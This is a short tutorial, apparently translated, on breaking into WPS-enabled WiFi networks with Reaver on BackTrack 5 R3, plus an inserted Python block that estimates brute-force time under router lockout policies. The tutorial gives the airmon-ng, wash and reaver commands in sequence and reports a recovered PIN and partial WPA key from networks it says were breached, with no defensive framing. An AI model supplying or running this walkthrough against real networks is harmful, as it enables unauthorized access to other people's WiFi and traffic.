REAVER ATTACK WITH BACKTRACK 5 R3 AGAINST WEP, WPA AND WPA2 NETWORKS ON ROUTERS WITH THE WPS STANDARD.
The WPS system has a weakness in one of the methods the standard provides for adding new equipment to a WiFi network, specifically the one that uses a PIN. A client trying to connect can send any 8-digit PIN, and if it does not match the access point's PIN, the access point reports an error. It has been discovered, however, that a response is obtained after sending only the first 4 digits. The number of possibilities therefore drops from 100 million combinations to just 11,000, so a brute-force attack can find the PIN in a matter of hours.
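The "matter of hours" figure above depends on how fast the access point accepts PIN attempts. The following added example (not part of the original page) computes the worst-case time to exhaust the 11,000-PIN space compared with the 100 million space, with and without a failed-PIN lockout on the access point. The one-second-per-attempt rate and the lockout policies are assumed values, not measurements.

```python
"""Added example: worst-case time to exhaust the WPS PIN space under lockout."""
from dataclasses import dataclass

FULL_SPACE = 10**8            # 8-digit PIN validated as a whole (the page's 100 million)
SPLIT_SPACE = 10**4 + 10**3   # halves confirmed separately; the 8th digit is a
                              # checksum, so the second half has 3 free digits


@dataclass(frozen=True)
class LockoutPolicy:
    """Hypothetical AP setting: after max_failures wrong PINs, WPS is refused for lock_seconds."""
    max_failures: int = 0     # 0 means the AP never locks
    lock_seconds: float = 0.0


def worst_case_seconds(attempts, seconds_per_attempt, policy):
    """Upper bound on the time needed to try `attempts` PINs against `policy`."""
    base = attempts * seconds_per_attempt
    if policy.max_failures <= 0:
        return base
    # Worst case: every attempt but the last fails, and each full batch of
    # failures triggers one lock period before the next attempt is accepted.
    locks = (attempts - 1) // policy.max_failures
    return base + locks * policy.lock_seconds


def compare(seconds_per_attempt=1.0):
    """Return {policy name: (hours with split check, hours with whole-PIN check)}."""
    policies = {  # constructed sample policies
        "no lockout": LockoutPolicy(),
        "3 failures / 60 s": LockoutPolicy(3, 60),
        "10 failures / 1 h": LockoutPolicy(10, 3600),
    }
    return {
        name: tuple(round(worst_case_seconds(n, seconds_per_attempt, p) / 3600, 1)
                    for n in (SPLIT_SPACE, FULL_SPACE))
        for name, p in policies.items()
    }


if __name__ == "__main__":
    for name, (split_h, full_h) in compare().items():
        print(f"{name:18} split: {split_h:>8} h   whole PIN: {full_h:>12} h")
```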
First we list the existing network adapters.
Monitor mode is enabled.
Command: airmon-ng start wlan0. This must enable the mon0 interface, which is the one used to launch the reaver attack.
(Figure: steps 1 and 2.)
We check which networks have WPS unlocked and can be attacked. (Note: if no network appears after running the command, there are no networks with these characteristics in the area.)
Command: wash -i mon0
4TH AND LAST STEP.
We start the attack, which works on PINs rather than on packets like the previous ones: the system tests all possible combinations of a group of 8 digits to gain access to the key. (Note: in the networks that were breached the PIN was 12345670; with another combination it takes 1-2 hours.)
Command: reaver -i mon0 -b (bssid) -c (channel) -vv
As you can see, the PIN is 12345670
and the key is 364137324339…, and the network is WPA.